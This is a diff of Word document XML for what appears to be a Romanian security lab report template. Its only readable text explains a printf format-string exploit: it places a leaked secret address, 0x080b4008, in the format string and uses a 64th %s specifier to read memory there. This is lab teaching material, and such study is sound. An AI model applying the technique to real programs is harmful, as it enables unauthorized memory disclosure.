+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In informatiile furnizate de catre server, acesta mentioneaza faptul ca adresa unde se afla secret-ul este </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="C9211E"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">0x080b4008  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>punem adresa in formatul de string pentru printf, iar apoi al 64 speficator de format va fi %s, care va merge si va citi valoarea de la adresa data la inceput</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="9">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="6220460"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="8" name="Image8" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="8" name="Image8" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="6220460"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:r>
     </w:p>
     <w:p>
@@ -1867,7 +2288,7 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId9"/>
+      <w:headerReference w:type="default" r:id="rId10"/>
       <w:type w:val="nextPage"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:left="1440" w:right="1440" w:header="720" w:top="777" w:footer="0" w:bottom="1440" w:gutter="0"/>
@@ -2335,6 +2756,143 @@
   <w:abstractNum w:abstractNumId="4">
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
       <w:numFmt w:val="none"/>
       <w:suff w:val="nothing"/>
       <w:lvlText w:val=""/>
@@ -2462,6 +3020,9 @@
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="5"/>
   </w:num>
 </w:numbering>
 </file>
@@ -2864,6 +3425,7 @@
     <w:qFormat/>
     <w:pPr>
       <w:widowControl/>
+      <w:suppressAutoHyphens w:val="true"/>
       <w:bidi w:val="0"/>
       <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="200"/>
       <w:jc w:val="left"/>

--- a/L02/SablonRaportL02.docx
+++ b/L02/SablonRaportL02.docx
@@ -1260,7 +1260,7 @@
           <w:szCs w:val="22"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t>punem adresa in formatul de string pentru printf, iar apoi al 64 speficator de format va fi %s, care va merge si va citi valoarea de la adresa data la inceput</w:t>
+        <w:t>punem adresa in formatul de string pentru printf, iar apoi al 64-lea speficator de format va fi %s, care va merge si va citi valoarea de la adresa data la inceput</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1284,12 +1284,12 @@
           <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="9">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
